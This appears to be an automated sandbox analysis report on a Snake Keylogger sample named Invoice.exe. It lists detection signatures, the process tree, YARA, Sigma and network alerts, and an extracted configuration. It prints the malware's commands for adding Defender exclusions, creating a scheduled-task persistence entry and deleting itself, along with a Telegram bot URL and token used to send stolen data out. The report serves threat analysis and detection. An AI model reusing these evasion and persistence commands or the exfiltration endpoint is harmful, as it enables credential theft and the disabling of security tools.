Edit tour

Windows Analysis Report
Invoice.exe

Overview

General Information

Sample name:	Invoice.exe
Analysis ID:	1635033
MD5:	97fbc4c5452a0d478e708c3ad9e09536
SHA1:	d3b168446645934f915b1f7689d1187e93222d96
SHA256:	f73d33967467d57d009640324c5c6036bb4e32127ec73cf44882a2eee9d5c4e2
Tags:	exeuser-threatcat_ch
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected Snake Keylogger

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Initial sample is a PE file and has a suspicious name

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Invoice.exe (PID: 7028 cmdline: "C:\Users\user\Desktop\Invoice.exe" MD5: 97FBC4C5452A0D478E708C3AD9E09536)

powershell.exe (PID: 4768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7696 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 420 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7196 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HbxYXheklrhvR" /XML "C:\Users\user\AppData\Local\Temp\tmpE22E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 7384 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

RegSvcs.exe (PID: 7396 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cmd.exe (PID: 7800 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 7364 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

WerFault.exe (PID: 7520 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7028 -s 1808 MD5: C31336C1EFC2CCB44B4326EA793040F2)

HbxYXheklrhvR.exe (PID: 7588 cmdline: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe MD5: 97FBC4C5452A0D478E708C3AD9E09536)

WerFault.exe (PID: 7496 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 1304 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6820629737:AAGJ8tOkoD9jFHkd_L1kG1ntQ1J6zLhFsMc/sendMessage?chat_id=6783205225", "Token": "6820629737:AAGJ8tOkoD9jFHkd_L1kG1ntQ1J6zLhFsMc", "Chat_id": "6783205225", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.1497789349.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1497789349.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.1497789349.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14843:$a1: get_encryptedPassword 0x14b2f:$a2: get_encryptedUsername 0x1464f:$a3: get_timePasswordChanged 0x1474a:$a4: get_passwordField 0x14859:$a5: set_encryptedPassword 0x15ee0:$a7: get_logins 0x15e43:$a10: KeyLoggerEventArgs 0x15aae:$a11: KeyLoggerEventArgsEventHandler
00000009.00000002.1497789349.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1984c:$x1: $%SMTPDV$ 0x18230:$x2: $#TheHashHere%& 0x197f4:$x3: %FTPDV$ 0x181d0:$x4: $%TelegramDv$ 0x15aae:$x5: KeyLoggerEventArgs 0x15e43:$x5: KeyLoggerEventArgs 0x19818:$m2: Clipboard Logs ID 0x19a56:$m2: Screenshot Logs ID 0x19b66:$m2: keystroke Logs ID 0x19e40:$m3: SnakePW 0x19a2e:$m4: \SnakeKeylogger\
00000009.00000002.1500060552.0000000003211000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1344246907.0000000003B0F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1344246907.0000000003B0F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1344246907.0000000003B0F000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x96593:$a1: get_encryptedPassword 0xb6fb3:$a1: get_encryptedPassword 0xd77d3:$a1: get_encryptedPassword 0x9687f:$a2: get_encryptedUsername 0xb729f:$a2: get_encryptedUsername 0xd7abf:$a2: get_encryptedUsername 0x9639f:$a3: get_timePasswordChanged 0xb6dbf:$a3: get_timePasswordChanged 0xd75df:$a3: get_timePasswordChanged 0x9649a:$a4: get_passwordField 0xb6eba:$a4: get_passwordField 0xd76da:$a4: get_passwordField 0x965a9:$a5: set_encryptedPassword 0xb6fc9:$a5: set_encryptedPassword 0xd77e9:$a5: set_encryptedPassword 0x97c30:$a7: get_logins 0xb8650:$a7: get_logins 0xd8e70:$a7: get_logins 0x97b93:$a10: KeyLoggerEventArgs 0xb85b3:$a10: KeyLoggerEventArgs 0xd8dd3:$a10: KeyLoggerEventArgs
00000000.00000002.1344246907.0000000003B0F000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x9b59c:$x1: $%SMTPDV$ 0xbbfbc:$x1: $%SMTPDV$ 0xdc7dc:$x1: $%SMTPDV$ 0x99f80:$x2: $#TheHashHere%& 0xba9a0:$x2: $#TheHashHere%& 0xdb1c0:$x2: $#TheHashHere%& 0x9b544:$x3: %FTPDV$ 0xbbf64:$x3: %FTPDV$ 0xdc784:$x3: %FTPDV$ 0x99f20:$x4: $%TelegramDv$ 0xba940:$x4: $%TelegramDv$ 0xdb160:$x4: $%TelegramDv$ 0x977fe:$x5: KeyLoggerEventArgs 0x97b93:$x5: KeyLoggerEventArgs 0xb821e:$x5: KeyLoggerEventArgs 0xb85b3:$x5: KeyLoggerEventArgs 0xd8a3e:$x5: KeyLoggerEventArgs 0xd8dd3:$x5: KeyLoggerEventArgs 0x9b568:$m2: Clipboard Logs ID 0x9b7a6:$m2: Screenshot Logs ID 0x9b8b6:$m2: keystroke Logs ID
Process Memory Space: Invoice.exe PID: 7028	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Invoice.exe PID: 7028	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Invoice.exe PID: 7028	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Invoice.exe PID: 7028	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x19f415:$a1: get_encryptedPassword 0x19f6f7:$a2: get_encryptedUsername 0x19f22b:$a3: get_timePasswordChanged 0x19f326:$a4: get_passwordField 0x19f42b:$a5: set_encryptedPassword 0x1a1901:$a7: get_logins 0x1a1864:$a10: KeyLoggerEventArgs 0x1a14cf:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Invoice.exe PID: 7028	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1a14cf:$x5: KeyLoggerEventArgs 0x1a1864:$x5: KeyLoggerEventArgs 0x1a216b:$x5: KeyLoggerEventArgs 0x1a24cc:$x5: KeyLoggerEventArgs 0x1a3a8f:$m2: Clipboard Logs ID 0x1a3b95:$m2: Screenshot Logs ID 0x1a3beb:$m2: keystroke Logs ID 0x1a3d20:$m3: SnakePW 0x1a3b81:$m4: \SnakeKeylogger\
Process Memory Space: RegSvcs.exe PID: 7396	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7396	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 7396	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1cf52:$a1: get_encryptedPassword 0x1d234:$a2: get_encryptedUsername 0x1cd68:$a3: get_timePasswordChanged 0x1ce63:$a4: get_passwordField 0x1cf68:$a5: set_encryptedPassword 0x1f43e:$a7: get_logins 0x1f3a1:$a10: KeyLoggerEventArgs 0x1f00c:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 7396	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1f00c:$x5: KeyLoggerEventArgs 0x1f3a1:$x5: KeyLoggerEventArgs 0x1fca8:$x5: KeyLoggerEventArgs 0x20009:$x5: KeyLoggerEventArgs 0x215cc:$m2: Clipboard Logs ID 0x216d2:$m2: Screenshot Logs ID 0x21728:$m2: keystroke Logs ID 0x2185d:$m3: SnakePW 0x216be:$m4: \SnakeKeylogger\
Process Memory Space: HbxYXheklrhvR.exe PID: 7588	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Invoice.exe.3b90b50.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Invoice.exe.3b90b50.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Invoice.exe.3b90b50.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c43:$a1: get_encryptedPassword 0x12f2f:$a2: get_encryptedUsername 0x12a4f:$a3: get_timePasswordChanged 0x12b4a:$a4: get_passwordField 0x12c59:$a5: set_encryptedPassword 0x142e0:$a7: get_logins 0x14243:$a10: KeyLoggerEventArgs 0x13eae:$a11: KeyLoggerEventArgsEventHandler
0.2.Invoice.exe.3b90b50.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a602:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19834:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c67:$a4: \Orbitum\User Data\Default\Login Data 0x1aca6:$a5: \Kometa\User Data\Default\Login Data
0.2.Invoice.exe.3b90b50.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1383e:$s1: UnHook 0x13845:$s2: SetHook 0x1384d:$s3: CallNextHook 0x1385a:$s4: _hook
0.2.Invoice.exe.3b90b50.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c4c:$x1: $%SMTPDV$ 0x16630:$x2: $#TheHashHere%& 0x17bf4:$x3: %FTPDV$ 0x165d0:$x4: $%TelegramDv$ 0x13eae:$x5: KeyLoggerEventArgs 0x14243:$x5: KeyLoggerEventArgs 0x17c18:$m2: Clipboard Logs ID 0x17e56:$m2: Screenshot Logs ID 0x17f66:$m2: keystroke Logs ID 0x18240:$m3: SnakePW 0x17e2e:$m4: \SnakeKeylogger\
9.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
9.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a43:$a1: get_encryptedPassword 0x14d2f:$a2: get_encryptedUsername 0x1484f:$a3: get_timePasswordChanged 0x1494a:$a4: get_passwordField 0x14a59:$a5: set_encryptedPassword 0x160e0:$a7: get_logins 0x16043:$a10: KeyLoggerEventArgs 0x15cae:$a11: KeyLoggerEventArgsEventHandler
9.2.RegSvcs.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c402:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b634:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba67:$a4: \Orbitum\User Data\Default\Login Data 0x1caa6:$a5: \Kometa\User Data\Default\Login Data
9.2.RegSvcs.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1563e:$s1: UnHook 0x15645:$s2: SetHook 0x1564d:$s3: CallNextHook 0x1565a:$s4: _hook
9.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19a4c:$x1: $%SMTPDV$ 0x18430:$x2: $#TheHashHere%& 0x199f4:$x3: %FTPDV$ 0x183d0:$x4: $%TelegramDv$ 0x15cae:$x5: KeyLoggerEventArgs 0x16043:$x5: KeyLoggerEventArgs 0x19a18:$m2: Clipboard Logs ID 0x19c56:$m2: Screenshot Logs ID 0x19d66:$m2: keystroke Logs ID 0x1a040:$m3: SnakePW 0x19c2e:$m4: \SnakeKeylogger\
0.2.Invoice.exe.3bb1570.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Invoice.exe.3bb1570.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Invoice.exe.3bb1570.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c43:$a1: get_encryptedPassword 0x12f2f:$a2: get_encryptedUsername 0x12a4f:$a3: get_timePasswordChanged 0x12b4a:$a4: get_passwordField 0x12c59:$a5: set_encryptedPassword 0x142e0:$a7: get_logins 0x14243:$a10: KeyLoggerEventArgs 0x13eae:$a11: KeyLoggerEventArgsEventHandler
0.2.Invoice.exe.3bb1570.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a602:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19834:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c67:$a4: \Orbitum\User Data\Default\Login Data 0x1aca6:$a5: \Kometa\User Data\Default\Login Data
0.2.Invoice.exe.3bb1570.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1383e:$s1: UnHook 0x13845:$s2: SetHook 0x1384d:$s3: CallNextHook 0x1385a:$s4: _hook
0.2.Invoice.exe.3bb1570.2.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c4c:$x1: $%SMTPDV$ 0x16630:$x2: $#TheHashHere%& 0x17bf4:$x3: %FTPDV$ 0x165d0:$x4: $%TelegramDv$ 0x13eae:$x5: KeyLoggerEventArgs 0x14243:$x5: KeyLoggerEventArgs 0x17c18:$m2: Clipboard Logs ID 0x17e56:$m2: Screenshot Logs ID 0x17f66:$m2: keystroke Logs ID 0x18240:$m3: SnakePW 0x17e2e:$m4: \SnakeKeylogger\
0.2.Invoice.exe.3bb1570.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Invoice.exe.3bb1570.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Invoice.exe.3bb1570.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a43:$a1: get_encryptedPassword 0x35263:$a1: get_encryptedPassword 0x14d2f:$a2: get_encryptedUsername 0x3554f:$a2: get_encryptedUsername 0x1484f:$a3: get_timePasswordChanged 0x3506f:$a3: get_timePasswordChanged 0x1494a:$a4: get_passwordField 0x3516a:$a4: get_passwordField 0x14a59:$a5: set_encryptedPassword 0x35279:$a5: set_encryptedPassword 0x160e0:$a7: get_logins 0x36900:$a7: get_logins 0x16043:$a10: KeyLoggerEventArgs 0x36863:$a10: KeyLoggerEventArgs 0x15cae:$a11: KeyLoggerEventArgsEventHandler 0x364ce:$a11: KeyLoggerEventArgsEventHandler
0.2.Invoice.exe.3bb1570.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1563e:$s1: UnHook 0x35e5e:$s1: UnHook 0x15645:$s2: SetHook 0x35e65:$s2: SetHook 0x1564d:$s3: CallNextHook 0x35e6d:$s3: CallNextHook 0x1565a:$s4: _hook 0x35e7a:$s4: _hook
0.2.Invoice.exe.3bb1570.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19a4c:$x1: $%SMTPDV$ 0x3a26c:$x1: $%SMTPDV$ 0x18430:$x2: $#TheHashHere%& 0x38c50:$x2: $#TheHashHere%& 0x199f4:$x3: %FTPDV$ 0x3a214:$x3: %FTPDV$ 0x183d0:$x4: $%TelegramDv$ 0x38bf0:$x4: $%TelegramDv$ 0x15cae:$x5: KeyLoggerEventArgs 0x16043:$x5: KeyLoggerEventArgs 0x364ce:$x5: KeyLoggerEventArgs 0x36863:$x5: KeyLoggerEventArgs 0x19a18:$m2: Clipboard Logs ID 0x19c56:$m2: Screenshot Logs ID 0x19d66:$m2: keystroke Logs ID 0x3a238:$m2: Clipboard Logs ID 0x3a476:$m2: Screenshot Logs ID 0x3a586:$m2: keystroke Logs ID 0x1a040:$m3: SnakePW 0x3a860:$m3: SnakePW 0x19c2e:$m4: \SnakeKeylogger\
0.2.Invoice.exe.3b90b50.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Invoice.exe.3b90b50.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Invoice.exe.3b90b50.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a43:$a1: get_encryptedPassword 0x35463:$a1: get_encryptedPassword 0x55c83:$a1: get_encryptedPassword 0x14d2f:$a2: get_encryptedUsername 0x3574f:$a2: get_encryptedUsername 0x55f6f:$a2: get_encryptedUsername 0x1484f:$a3: get_timePasswordChanged 0x3526f:$a3: get_timePasswordChanged 0x55a8f:$a3: get_timePasswordChanged 0x1494a:$a4: get_passwordField 0x3536a:$a4: get_passwordField 0x55b8a:$a4: get_passwordField 0x14a59:$a5: set_encryptedPassword 0x35479:$a5: set_encryptedPassword 0x55c99:$a5: set_encryptedPassword 0x160e0:$a7: get_logins 0x36b00:$a7: get_logins 0x57320:$a7: get_logins 0x16043:$a10: KeyLoggerEventArgs 0x36a63:$a10: KeyLoggerEventArgs 0x57283:$a10: KeyLoggerEventArgs
0.2.Invoice.exe.3b90b50.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1563e:$s1: UnHook 0x3605e:$s1: UnHook 0x5687e:$s1: UnHook 0x15645:$s2: SetHook 0x36065:$s2: SetHook 0x56885:$s2: SetHook 0x1564d:$s3: CallNextHook 0x3606d:$s3: CallNextHook 0x5688d:$s3: CallNextHook 0x1565a:$s4: _hook 0x3607a:$s4: _hook 0x5689a:$s4: _hook
0.2.Invoice.exe.3b90b50.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19a4c:$x1: $%SMTPDV$ 0x3a46c:$x1: $%SMTPDV$ 0x5ac8c:$x1: $%SMTPDV$ 0x18430:$x2: $#TheHashHere%& 0x38e50:$x2: $#TheHashHere%& 0x59670:$x2: $#TheHashHere%& 0x199f4:$x3: %FTPDV$ 0x3a414:$x3: %FTPDV$ 0x5ac34:$x3: %FTPDV$ 0x183d0:$x4: $%TelegramDv$ 0x38df0:$x4: $%TelegramDv$ 0x59610:$x4: $%TelegramDv$ 0x15cae:$x5: KeyLoggerEventArgs 0x16043:$x5: KeyLoggerEventArgs 0x366ce:$x5: KeyLoggerEventArgs 0x36a63:$x5: KeyLoggerEventArgs 0x56eee:$x5: KeyLoggerEventArgs 0x57283:$x5: KeyLoggerEventArgs 0x19a18:$m2: Clipboard Logs ID 0x19c56:$m2: Screenshot Logs ID 0x19d66:$m2: keystroke Logs ID
Click to see the 23 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Invoice.exe", ParentImage: C:\Users\user\Desktop\Invoice.exe, ParentProcessId: 7028, ParentProcessName: Invoice.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe", ProcessId: 4768, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HbxYXheklrhvR" /XML "C:\Users\user\AppData\Local\Temp\tmpE22E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HbxYXheklrhvR" /XML "C:\Users\user\AppData\Local\Temp\tmpE22E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Invoice.exe", ParentImage: C:\Users\user\Desktop\Invoice.exe, ParentProcessId: 7028, ParentProcessName: Invoice.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HbxYXheklrhvR" /XML "C:\Users\user\AppData\Local\Temp\tmpE22E.tmp", ProcessId: 7196, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Invoice.exe", ParentImage: C:\Users\user\Desktop\Invoice.exe, ParentProcessId: 7028, ParentProcessName: Invoice.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe", ProcessId: 4768, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HbxYXheklrhvR" /XML "C:\Users\user\AppData\Local\Temp\tmpE22E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HbxYXheklrhvR" /XML "C:\Users\user\AppData\Local\Temp\tmpE22E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Invoice.exe", ParentImage: C:\Users\user\Desktop\Invoice.exe, ParentProcessId: 7028, ParentProcessName: Invoice.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HbxYXheklrhvR" /XML "C:\Users\user\AppData\Local\Temp\tmpE22E.tmp", ProcessId: 7196, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-11T09:59:38.653970+0100	2803305	3	Unknown Traffic	192.168.2.4	49720	104.21.16.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-11T09:59:33.058094+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49715	132.226.8.169	80	TCP
2025-03-11T09:59:36.542463+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49715	132.226.8.169	80	TCP
2025-03-11T09:59:39.734228+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49725	132.226.8.169	80	TCP
2025-03-11T09:59:42.730173+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49730	132.226.8.169	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000009.00000002.1497789349.0000000000402000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6820629737:AAGJ8tOkoD9jFHkd_L1kG1ntQ1J6zLhFsMc/sendMessage?chat_id=6783205225", "Token": "6820629737:AAGJ8tOkoD9jFHkd_L1kG1ntQ1J6zLhFsMc", "Chat_id": "6783205225", "Version": "5.1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe

ReversingLabs: Detection: 44%

Multi AV Scanner detection for submitted file

Source: Invoice.exe	Virustotal: Detection: 49%			Perma Link
Source: Invoice.exe	ReversingLabs: Detection: 44%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

